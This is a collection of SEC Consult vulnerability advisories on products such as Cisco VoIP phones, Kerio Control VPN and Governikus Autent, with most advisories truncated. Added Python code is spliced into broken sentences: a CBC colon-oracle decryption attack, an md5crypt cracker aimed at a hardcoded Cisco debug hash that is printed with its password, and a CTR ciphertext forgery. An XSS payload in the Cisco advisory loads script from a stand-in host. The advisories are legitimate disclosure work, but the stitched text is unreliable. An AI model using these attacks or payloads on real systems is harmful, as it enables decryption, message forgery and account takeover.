The padding oracle attack that SEC Consult demonstrated previously was found to be no longer trivially exploitable. However, another approach was found that allows an attacker to bypass transport encryption. This attack abuses the fact that the server leaks whether a decrypted string contains a colon (more specifically, whether it is a valid MIME header in the form of :). By sending multiple requests and observing whether the decrypted string contains a colon, an attacker can narrow down the possible values for a single plaintext character. When the number of possible values is one, the plaintext byte is known. The attacker can use this approach to decrypt all characters of a given ciphertext.

2) Signature Bypass
SEC Consult previously demonstrated an XML Signature Wrapping attack. While this exact attack is no longer possible, another similar attack was identified. XML signatures are constructed as follows:
* an element "SignedInfo" contains multiple "Reference" elements, each referring to a signed element. The contents
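Illustration of vulnerability 1 of the OSCI advisory above, added here and not taken from the advisory or the OSCI library: a CBC decryption oracle that answers only whether the plaintext contains a colon, and the byte-by-byte recovery it enables. The block cipher is a SHA-256-based Feistel stand-in (the attack uses only the CBC structure, so AES-CBC behaves identically), the plaintext is constructed, and the attacker is assumed to control the IV, as with XML Encryption where the IV is prepended to the ciphertext, and to be attacking ASCII data. To read block n the attacker submits the preceding ciphertext block, XORed with a chosen mask, as the IV together with block n alone, so the server decrypts exactly P[n] XOR mask and no garbage block can produce stray colons.

```python
import hashlib
import os

BLOCK = 16
COLON = 0x3A  # ':'


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Round function of the stand-in cipher: SHA-256 as a keyed PRF, truncated to 8 bytes.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, blk):
    """Stand-in 128-bit block cipher (4-round Feistel over SHA-256). Not AES; any block
    cipher works here because the attack needs only CBC's structure."""
    l, r = blk[:8], blk[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    assert len(pt) % BLOCK == 0, "demo uses block-aligned plaintext, no padding"
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)


def make_colon_oracle(key):
    """Model of the server-side leak: per request the attacker learns only whether the
    decrypted data contains ':' (i.e. parses as a MIME header)."""
    def oracle(iv, ct):
        return COLON in cbc_decrypt(key, iv, ct)
    return oracle


def recover_block(oracle, prev, blk):
    """Recover one plaintext block. `prev` is the IV or the preceding ciphertext block;
    submitting (prev XOR mask, blk) makes the server decrypt exactly P XOR mask."""
    query = lambda mask: oracle(_xor(prev, mask), blk)
    result = bytearray(BLOCK)
    for i in range(BLOCK):
        # Assumption: ASCII plaintext. XOR 0x80 on every *other* byte pushes it to >= 0x80,
        # so none of them can be ':' and the oracle answers for position i alone.
        mask = bytearray([0x80] * BLOCK)
        mask[i] = 0x00
        if query(bytes(mask)):            # the unmodified byte i already is a colon
            result[i] = COLON
            continue
        for guess in range(1, 256):       # P[i] ^ guess == ':'  <=>  P[i] == guess ^ ':'
            mask[i] = guess
            if query(bytes(mask)):
                result[i] = guess ^ COLON
                break
    return bytes(result)


def recover_plaintext(oracle, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(recover_block(oracle, prev, blk))
        prev = blk
    return b"".join(out)


def demo():
    key, iv = os.urandom(16), os.urandom(16)        # never seen by the attacker code
    pt = b"Content-Type: text/xml;charset=U"        # constructed 32-byte MIME-style plaintext
    ct = cbc_encrypt(key, iv, pt)
    return recover_plaintext(make_colon_oracle(key), iv, ct) == pt


if __name__ == "__main__":
    print("recovered plaintext without the key:", demo())
```

Each byte costs at most 256 oracle queries, which is the "narrowing down" the advisory describes; an authenticated mode such as AES-GCM rejects the modified ciphertext before anything is parsed, so the oracle disappears.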
SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 >
=======================================================================
              title: Cross-site scripting
            product: CA Automic Workload Automation Web Interface (AWI)
                     (formerly Automic Automation Engine, UC4)
 vulnerable version: 12.0, 12.1, 12.2
      fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1
         CVE number: CVE-2019-6504
             impact: medium
           homepage: https://www.ca.com
              found: 2018-10-15
                 by: Marc Nimmerrichter (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"The modern enterprise needs to orchestrate a complex, diverse landscape of applications, platforms and technologies. Workload automation can prove a critical differentiator, but only if it provides intelligent automation driven by data analytics. [...] CA Automic Workload Automation gives you the agility, speed, visibility and scalability needed to respond to the constantly changing technology landscape. It centrally manages and automates the execution of business processes end-to-end; across mainframe, cloud and hybrid environments in a way that never stops, even when doing an upgrade to the next version."

Source: https://www.ca.com/us/products/workload-automation-solution.html

Business recommendation:
------------------------
Be aware that restrictions on privileges can be bypassed and that attackers may be able to take over other users' accounts. SEC Consult recommends applying the vendor patch as soon as possible.

Vulnerability overview/description:
-----------------------------------
The Automation Engine Web Interface, short AWI, is susceptible to a persistent cross-site scripting attack (XSS). The origin of this vulnerability is an outdated version of the Vaadin framework (version 7.7.9), which is heavily used in the implementation of the UI. This version of the Vaadin framework is vulnerable to an XSS vulnerability in tooltips [1]. If attackers can control the content of tooltips created with the framework, they can execute arbitrary JavaScript code in the context of the user viewing the tooltip. AWI uses tooltips for various data fields, e.g. for the title of created objects. Thus, if a user has the privilege to create or edit objects, they can inject JavaScript code, which will get executed by other users when they move their cursor over the text containing the tooltip.

[1] https://github.com/vaadin/framework/issues/8731

Proof of concept:
-----------------
The vulnerability can be reproduced by creating/editing any object in AWI and using a normal JavaScript payload, e.g. with an onerror handler. Because tooltips are only shown in AWI when the text length exceeds the column width, the text needs to be padded with some sample text to make sure the JavaScript code gets executed.

Vulnerable / tested versions:
-----------------------------
The tested version of AWI was 12.2.0.

Vendor contact timeline:
------------------------
2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email.
2018-10-25: Vendor confirms the receipt of the vulnerability information.
2018-11-22: Vendor confirms the vulnerability and asks for postponement of the advisory release date.
2018-12-11: Vendor provides planned patch numbers.
2019-01-17: Vendor informs SEC Consult that patches have been published.
2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release date for the SEC Consult advisory and the CA Technologies Security Notice.
2019-01-24: Public release of security advisory

Solution:
---------
The vendor provides patched versions:
Automic.Web.Interface 12.0.6 HF2
Automic.Web.Interface 12.1.3 HF3
Automic.Web.Interface 12.2.1 HF1
Available from: https://downloads.automic.com/

The vendor released a security advisory which is available here:
https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Cisco VoIP Phones, e.g. models 88XX
 vulnerable version: See list of vulnerable devices/firmwares below
      fixed version: 12.5.1 MN
         CVE number: CVE-2018-0461
             impact: high
           homepage: https://www.cisco.com
              found: 10/2018
                 by: W. Schober, IoT Inspector (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes seeking secure, high-quality, full-featured VoIP. Select models provide affordable entry to HD video and support for highly-active, in-campus mobile workers."

Source: https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html

Business recommendation:
------------------------
SEC Consult recommends updating the devices to the newest firmware (12.5.1 MN), where all the documented issues are fixed according to the vendor. We want to thank Cisco for the very professional response and great coordination.

Vulnerability overview/description:
-----------------------------------
1) Arbitrary Script Injection
The VOIP phones can be managed directly via the integrated keyboard and the built-in screen. In the configuration menu a few spots allow users to input text via the integrated keyboard into text boxes (e.g. Hostname). Those text input fields are prone to JavaScript-like code injection. An attacker is able to inject arbitrary payloads via the T9 keyboard.

2) Hard coded and weak secrets (identified during an automated firmware analysis by IoT Inspector)
The firmware, which is served directly by Cisco, contains multiple hard coded password hashes. They are stored in the /etc/passwd file and are hashed using an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere. Access via SSH using those credentials is possible. Due to the outdated algorithm in use (UNIX MD5+salt) and the very weak password it was easily possible to brute-force the password within seconds.

3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the built-in web application running on the VOIP phone were identified. Those routes lead to parts of the web application that are neither documented nor officially mentioned anywhere by Cisco. Those parts of the web application allow an attacker to debug the device and create memory dumps.

4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version numbers. It is not known which patches were backported by the vendor, but Cisco mentioned that they have implemented some. The potentially affected components are:
-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation "pp_key"
-) Linux Kernel Privilege Escalation "Mempodipper"
-) Multiple Linux Kernel CVE entries

Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco

Proof of concept:
-----------------
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VOIP phone via the built-in screen. There are also multiple locations where user input is parsed and displayed. It was possible to inject arbitrary (JavaScript) code directly into the phone UI. As an example, the hostname of the VOIP phone can be changed to the following value:

hostname“>http://$IP/sec.js onload=exec()>

The sec.js gets loaded from the remote host immediately and the exec function is executed.
< A screenshot can be found online on our website >

Further analysis has not been performed, but depending on the underlying libraries/system in use, it might be possible to get system level access via this attack vector.

2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user "debug":
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd

$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))

This hash corresponds to the following clear-text password: debug

The password for the users "root" and "default" is also stored in /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default

3) Undocumented debug functionality
The built-in VOIP phone web server offers multiple functionalities for the end user. During a manual analysis, undocumented endpoints with critical functionality were identified. The functionality can be found by visiting the following endpoint:
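Going back to item 2 of the Cisco advisory above: checking whether a firmware credential is weak does not need a cracking tool. This added Python (not Cisco code and not from the advisory) implements the "$1$" md5crypt scheme used for the quoted hash and runs a constructed mini wordlist over it. The audit helper and the wordlist are illustrative assumptions; the DES-style entry for root/default is skipped because only "$1$" is implemented here.

```python
import hashlib

_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: six bits at a time, least significant first."""
    out = ""
    for _ in range(count):
        out += _ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password, salt):
    """FreeBSD/glibc $1$ md5crypt (Poul-Henning Kamp's algorithm), pure Python."""
    pw = password.encode()
    salt = salt.encode()[:8]
    ctx = hashlib.md5(pw + b"$1$" + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, remaining)])
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):               # the deliberately slow part: 1000 rounds
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return "$1$" + salt.decode() + "$" + out


def verify_md5crypt(password, hash_string):
    """Check a candidate password against a $1$salt$hash entry from /etc/passwd or /etc/shadow."""
    prefix, salt, _ = hash_string.split("$")[1:]
    if prefix != "1":
        raise ValueError("not an md5crypt hash")
    return md5crypt(password, salt) == hash_string


def audit(entries, wordlist):
    """Try a wordlist against every $1$ hash in (user, hash) entries; return user -> password hits."""
    hits = {}
    for user, hashed in entries:
        if not hashed.startswith("$1$"):
            continue                      # DES-style entries are out of scope for this example
        for candidate in wordlist:
            if verify_md5crypt(candidate, hashed):
                hits[user] = candidate
                break
    return hits


# The debug-user hash quoted in the advisory above, plus the DES entry that is skipped.
PASSWD_ENTRIES = [("debug", "$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71"), ("root", "nCjlgBm7.lvX2")]
WORDLIST = ["cisco", "admin", "debug", "password"]   # constructed mini wordlist

if __name__ == "__main__":
    print(audit(PASSWD_ENTRIES, WORDLIST))
```

The 1000 MD5 rounds were the scheme's whole defence in 1994; on current hardware they are negligible, which is why a dictionary word falls "within seconds" as the advisory notes and why firmware should not ship any static account at all.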
SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 >
=======================================================================
              title: Inadequate cryptography implementation
            product: Kerio Control VPN protocol
 vulnerable version: <=9.2.7
      fixed version: 9.2.8
         CVE number: -
             impact: High
           homepage: http://www.kerio.com/products/kerio-control
              found: 2018-10
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Protect your network from viruses, malware and malicious activity with Kerio Control, the easy-to-administer yet powerful all-in-one security solution. Kerio Control brings together next-generation firewall capabilities -- including a network firewall and router, intrusion detection and prevention (IPS), gateway anti-virus, VPN, and web content and application filtering. These comprehensive capabilities and unmatched deployment flexibility make Kerio Control the ideal choice for small and mid-sized businesses."

"Link headquarters to remote users and branch offices securely and easily. Kerio's own VPN tunneling with dead-simple setup requires minimal configuration, and provides a high performance network connection. Or, use industry-standard IPsec/L2TP for connectivity from mobile devices or third-party firewalls. Enable 2-step verification for an extra layer of security on all forms of remote access."

Source: http://www.kerio.com/products/kerio-control

Business recommendation:
------------------------
During a quick evaluation of the Kerio Control VPN protocol it was apparent that the cryptographic protocol employed exhibits severe design issues. Generally, SEC Consult strongly recommends preferring well-established standard cryptographic protocols (e.g. DTLS, IPsec) over proprietary protocols wherever possible. Due to their widespread use, standard protocols receive much greater attention from experts, so many design issues in them have already been detected and mitigated. We therefore recommend businesses to switch from Kerio's proprietary VPN protocol to a standard protocol (Kerio Control e.g. supports IPsec).

Note that no full audit of Kerio Control, Kerio VPN or the cryptographic protocol has been conducted. In addition to the vulnerabilities described here, we already identified critical vulnerabilities in Kerio Control in 2016. Hence we suspect there are more major security deficiencies in the product. We therefore recommend GFI Software to greatly increase the efforts towards product security in order to keep customers secure.

We want to explicitly thank GFI for the professional handling of the communication during this whole process.

Vulnerability overview/description:
-----------------------------------
After a TLS connection is established between the Kerio VPN client and the Kerio Control appliance and cryptographic keys have been securely transferred over this connection, the data sent through the VPN is transmitted in UDP packets. Each of these packets is encrypted using Blowfish in CTR mode. As this mode does not provide data authenticity, encrypted data that is modified by an attacker results in a predictable modification of the plaintext. More precisely, bits that are flipped in the ciphertext result in the same bits being flipped in the plaintext after decryption.

Each encrypted UDP datagram contains a simple checksum (the same checksum used by IPv4). Assuming an attacker knows the plaintext data of a datagram and is able to modify its ciphertext, it is trivial to change parts of the message, e.g. inject content into the encrypted stream, while keeping the resulting checksum identical.

Proof of concept:
-----------------
SEC Consult provided a proof of concept exploit script to GFI, but it has been removed from this advisory in order to give customers more time to upgrade their infrastructure.

Vulnerable / tested versions:
-----------------------------
Version 9.2.7 build 2921 was found to be vulnerable. This version was the latest at the time of discovery, and older versions are affected as well.

Vendor contact timeline:
------------------------
2018-10-17: Creating support case at https://gfisoftware.force.com, asking for security contact
2018-10-17: GFI support: Asking to upload advisory to support portal
2018-10-19: Uploading advisory
2018-10-22: GFI support: Escalated to engineers to further investigate
2018-10-25: GFI support acknowledges vulnerability
2018-11-08: GFI support: Beta version with patch available (with AES 128)
2018-11-09: Asking for release date of the patch
2018-11-12: GF
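The malleability described in the Kerio overview above, as an added, self-contained illustration (the actual proof of concept was withheld by SEC Consult, and nothing here is Kerio code): a CTR keystream stand-in built from SHA-256 in place of Blowfish-CTR, a constructed datagram, and a forgery that rewrites a known plaintext word and rebalances the IPv4-style checksum through a slack word, all without the key. The datagram layout and the existence of a slack word the receiver ignores are assumptions for the demo; in a real packet any field the receiver does not validate serves the same purpose.

```python
import hashlib


def internet_checksum(data):
    """RFC 1071 one's-complement checksum, the one the IPv4 header uses."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def keystream(key, nonce, length):
    """Stand-in CTR keystream (SHA-256 of key||nonce||counter). Blowfish-CTR in the product
    shares the only property that matters here: ciphertext = plaintext XOR keystream."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def ctr_crypt(key, nonce, data):
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def forge(ct, known_pt, offset, new_bytes, slack_offset):
    """Rewrite `new_bytes` into the plaintext at word-aligned `offset` and repair the Internet
    checksum by adjusting the 16-bit word at `slack_offset`, without knowing the key.
    Returns (forged_ciphertext, forged_plaintext)."""
    assert offset % 2 == 0 and len(new_bytes) % 2 == 0 and slack_offset % 2 == 0
    pt = bytearray(known_pt)
    delta = 0
    for i in range(0, len(new_bytes), 2):
        old = int.from_bytes(pt[offset + i:offset + i + 2], "big")
        new = int.from_bytes(new_bytes[i:i + 2], "big")
        delta += old - new
        pt[offset + i:offset + i + 2] = new_bytes[i:i + 2]
    # One's-complement addition is arithmetic modulo 0xFFFF: adding (old - new) back into
    # the slack word leaves the folded sum, and therefore the checksum, unchanged.
    slack = int.from_bytes(pt[slack_offset:slack_offset + 2], "big")
    pt[slack_offset:slack_offset + 2] = ((slack + delta) % 0xFFFF).to_bytes(2, "big")
    # CTR has no integrity: ct' = ct XOR pt XOR pt' decrypts to pt' under the same keystream.
    forged_ct = bytes(c ^ a ^ b for c, a, b in zip(ct, known_pt, pt))
    return forged_ct, bytes(pt)


def demo():
    key, nonce = b"\x11" * 16, b"\x22" * 8           # unknown to the attacker; used only by the endpoints
    # Constructed datagram: a policy message with a two-byte slack word at the end (offset 26).
    pt = b"cmd=deny;host=10.0.0.5;pd=\x00\x00"
    ct = ctr_crypt(key, nonce, pt)
    forged_ct, forged_pt = forge(ct, pt, offset=4, new_bytes=b"pass", slack_offset=26)
    decrypted = ctr_crypt(key, nonce, forged_ct)     # what the receiving side computes
    return {
        "decrypts_to_forgery": decrypted == forged_pt,
        "checksum_unchanged": internet_checksum(decrypted) == internet_checksum(pt),
        "forged": forged_pt,
    }


if __name__ == "__main__":
    print(demo())
```

The receiver sees a datagram that decrypts cleanly and passes its checksum, yet says "pass" where the sender wrote "deny". A MAC or an AEAD mode (the vendor's fix moved to AES, but the authentication is the part that matters) would reject the modified ciphertext outright.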
SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Siglent Technologies SDS 1202X-E Digital Oscilloscope
 vulnerable version: V5.1.3.13
      fixed version: -
         CVE number: -
             impact: High
           homepage: http://siglenteu.com/
                     https://www.siglent.eu/
                     https://www.siglentamerica.com/
              found: 2018-08-06
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"SIGLENT is an international high-tech company, concentrating on R&D, sales, production and services of measurement products. As an ISO9001:2000 International Quality Management System and ISO 14001:2004 Environmental Management System Certified company, SIGLENT is also a member of the China Electronic Instrument Industry Association and Guangdong Instrument Representative Association. [...] SIGLENT focuses on the electronic test & measurement instrument industry and sees research & development as a core competency, while keeping a strong competitive edge through technology innovation and strict quality control. Try a Siglent product. Then compare the performance and the features to any other model, any other brand. Then compare the price. We believe there is no better value anyplace."

Source: http://www.siglenteu.com/about.aspx

Business recommendation:
------------------------
The identified backdoor accounts are accessible through Telnet, hence a compromise of the device via a local network attack is possible. Any malicious modification of measurement values may have serious impact on the product or service which is created or offered by using this oscilloscope. Therefore, all procedures which are executed with this device are untrustworthy.

SEC Consult recommends not to use this product within a network of a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. The vendor was unresponsive and did not provide a patch.

Vulnerability overview/description:
-----------------------------------
1) Hardcoded Backdoor Accounts
Two backdoor accounts are present on the system. A Telnet service is listening on port 23 which enables an attacker to connect as root to the oscilloscope via LAN. The password hashes are hardcoded and are difficult to change for the end user because the "shadow" file is stored on a cramfs (intentionally read-only) file system.

2) Missing Authentication / Design Issue
The software "EasyScopeX" can be used from any computer in the network to configure and interact with the oscilloscope. This is possible without prior authentication, which enables everyone to change settings on the oscilloscope.

3) Unencrypted Communication
The software "EasyScopeX" communicates via unencrypted TCP packets with the client computer / oscilloscope.

4) Outdated and Vulnerable Software Components
Multiple software components embedded in the firmware are outdated and found to be vulnerable to various publicly known security issues.

Proof of concept:
-----------------
1) Hardcoded Backdoor Accounts
The following password hashes were dumped from "/etc/shadow" by connecting to the UART interface on the PCB:
root
siglent
(The password hashes have been removed from this advisory)

2) Missing Authentication / Design Issue
It is sufficient to install the "EasyScopeX" software and control the oscilloscope without any authentication.

3) Unencrypted Communication
The software "EasyScopeX" communicates in plaintext via various ports by using the portmapper. The default ports are "5024" and "5025".

4) Outdated and Vulnerable Software Components
Using the IoT Inspector software we found the following outdated and vulnerable components:
* BusyBox 1.20.1
* GNU glibc 2.13
* Linux Kernel 3.19.0

Vulnerable / tested versions:
-----------------------------
The following device / firmware version has been tested:
* Siglent SDS1202X-E (V5.1.3.13)
It is assumed that other firmware versions are affected as well.

Vendor contact timeline:
------------------------
2018-08-22: Contacting German VDE CERT for coordination support
2018-09-04: Asking for a status update from the vendor
2018-09-05: VDE CERT: no response from vendor yet
2018-09-12: US sales person from Siglent has answered, VDE CERT is sending advisory to be forwarded to engineering
2018-10-10: Asking for a status update (affected versions, etc)
2018-10-10
SEC Consult SA-20181121-0 :: Signature Bypass / Authentication Bypass in Governikus Autent SDK
An additional blog post has been published on this topic as well: English version: https://r.sec-consult.com/governikus German version: https://r.sec-consult.com/gov SEC Consult Vulnerability Lab Security Advisory < 20181121-0 > === title: Signature Bypass / Authentication Bypass product: Governikus Autent SDK vulnerable version: <=3.8.1 fixed version: 3.8.1.2 CVE number: - impact: critical homepage: https://www.governikus.de/ found: 2018-06 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- German original, translated to English: "In the course of digitization, electronic identities have become indispensable. At the same time, the requirements for protection, handling with regard to legal security and the federation of electronic identities are increasing. With Governikus Autent, server and client components are available to ensure authentication through electronic identities. Governikus Autent meets all the requirements of a modern identity management solution.” Source: https://www.governikus.de/produkte-loesungen/governikus-autent-und-ausweisapp2/ Business recommendation: During a short crash test SEC Consult identified a critical vulnerability in the Governikus Autent SDK nPA authentication code (German id card authentication). This vulnerability could allow an attacker to impersonate any German citizen on a vulnerable web application. SEC Consult recommends to immediately apply the workaround described below or apply the patch provided by the vendor. Moreover, SEC Consult recommends web application providers to check historic log files for evidence of this attack. SEC Consult recommends conducting a thorough source code security review on the Governikus Autent components as they are integral for the security of many web applications. 
Vulnerability overview/description: --- The software component tested is used by web applications to integrate nPA authentication (authentication using the German official id document). As the last step of an authentication transaction, the web application the user authenticates against receives a string containing all relevant data about the citizen (e.g. first name, last name). As this string is signed by a trusted party (an eID server), the application can verify the authenticity of this string. The component in the web application that is supposed to verify this signature can be tricked into accepting a string that has been modified. An attacker that has acquired a single legitimately signed string can use this to authenticate as any German citizen to any web application that trusts the eID server's signature. An attacker could acquire such a signed string by hosting a web application and tricking a victim to authenticate, by gaining access to a signed string sent to a legitimate web application (man-in-the-middle attack, getting access to the access log) or by authenticating against a web application using his own id document. Proof of concept: - 1. Signature Bypass During the last step of the NPA transaction, the user is redirected to the SAML receiver of the web application she tried to authenticate against. The SAML response is sent as a URL parameter: https:///?SAMLResponse==<...>== According to the demo application, the first verification a SAML receiver is meant to do is call the method HttpRedirectUtils.checkQueryString passing the query string (as it is returned by request.getQueryString()). If this method returns false, the signature could not be verified. This method internally deconstructs the query string into individual parameters, reconstructs the query string and then verifies the signature. 
If, however, the query string contains multiple parameters of the same name, only the last occurrence of a parameter is built into the query string the signature is verified against. Therefore, if a query string is constructed as follows, the first SAML response is ignored during signature verification:
...?SAMLResponse==...

Afterwards, when the SAML response is processed, the application is likely to use the method ServletRequest.getParameter() to retrieve the SAML response (the demo application which is meant to show the integration of the library also does this). As per the specification of this method, the application server is supposed to return the first parameter value if multiple parameters with the same name were sent. Thus, the signature is verified against t
SEC Consult SA-20181116-0 :: Multiple critical vulnerabilities in Miss Marple Enterprise Edition
SEC Consult Vulnerability Lab Security Advisory < 20181116-0 >
===
title: Multiple critical vulnerabilities
product: Miss Marple Enterprise Edition
vulnerable version: <2.0
fixed version: 2.0
CVE number: CVE-2018-19233, CVE-2018-19234
impact: Critical
homepage: www.comparex-group.com
found: 2018-05-29
by: Marius Schwarz (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"As a global IT company with thirty years of experience, COMPAREX is one of the world’s leading IT service providers and no. 1 software license management company in the EMEA markets. COMPAREX develops innovative services that support management and leverage software products, leading to an overall improvement of workforce productivity. COMPAREX serves corporate customers spanning from small businesses to large international corporations as well as the public institutions supporting every customer during their digital journey towards productivity optimization. The portfolio has a solid foundation in license management, software procurement and cloud services. Substantial professional and managed services complete the portfolio to support customers with services tailored to their business demands."
Source: https://comparexusa.com/about-us/about/

Business recommendation:
The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available.

Vulnerability overview/description:
---
Application overview:
Miss Marple is an inventory software that consists of a client and a server part. The client (agent) gathers system information and uploads the results to a remote server in an encrypted ZIP file.

1) Hardcoded AES key (CVE-2018-19233)
A username and an encrypted password were identified in the Miss Marple Inventory Agent configuration file.
By decompiling the binary, the encryption method was identified as AES-256 with a hardcoded key and initialization vector. The credentials are used to deploy the inventory files to a remote server.

2) Uploading arbitrary files
There are two ways an attacker can upload arbitrary files to the server.

2.1) Patching the application binary to bypass the ZIP file extension check
Using this method, it is possible to upload any file to the server, even if the credentials are unknown to the attacker! This works because every file in a specific directory gets uploaded, as long as the file has the correct file extension. This can be bypassed because the file extension is only checked on the client side and not on the server side. Patching the binary is done by replacing the extension string with the file extension of the attacker's file, e.g. ".aspx", in the MMIA.exe binary itself.

2.2) Using cURL to upload arbitrary files
If the credentials are known to the attacker, it is possible to use tools like cURL to upload arbitrary files to the remote server.

Both ways can be used by an attacker to upload a web-shell to the server and execute arbitrary commands.

3) Missing update validation (CVE-2018-19234)
Besides the Miss Marple Inventory Agent, a Miss Marple Updater Service is running on all clients. This service checks for new versions on the same server. If the files are uploaded to the right directory on the server, the updater will download and execute them with the highest privileges (NT Authority\SYSTEM) without validating the binaries. This can also be used for escalating privileges on the client.

By uploading a web-shell using the methods described in vulnerability 2, an attacker gets sufficient write permissions to access the update directory and to place malicious files on the server. This will execute arbitrary code on all clients using Miss Marple.

Proof of concept:
-
1) Hardcoded AES key (CVE-2018-19233)
No proof of concept will be provided.
2) Uploading arbitrary files
2.1) No proof of concept will be provided. E.g. the Unicode string for ".zip" just has to be replaced with the file extension for the uploaded web-shell.
2.2) Using cURL to upload arbitrary files
It is possible to upload arbitrary files using cURL and the credentials obtained in 1).
3) Missing update validation (CVE-2018-19234)
No proof of concept will be provided.

Vulnerable / tested versions:
-
The following versions have been tested and found to be vulnerable:
Miss Marple Inventory Agent / Miss Marple Updater Service 1.13

Vendor contact timeline:
2018-06-
SEC Consult SA-20181114-0 :: Denial of Service in Microsoft Skype for Business
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
===
title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
                    Skype for Business 2016: before v16.0.4756.1000
fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000
               Skype for Business 2016 v16.0.4756.1000
CVE number: CVE-2018-8546
impact: Medium
homepage: https://www.skype.com/en/business/
found: 08/2018
by: Sabine Degen (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software."
Source: https://en.wikipedia.org/wiki/Skype_for_Business

Business recommendation:
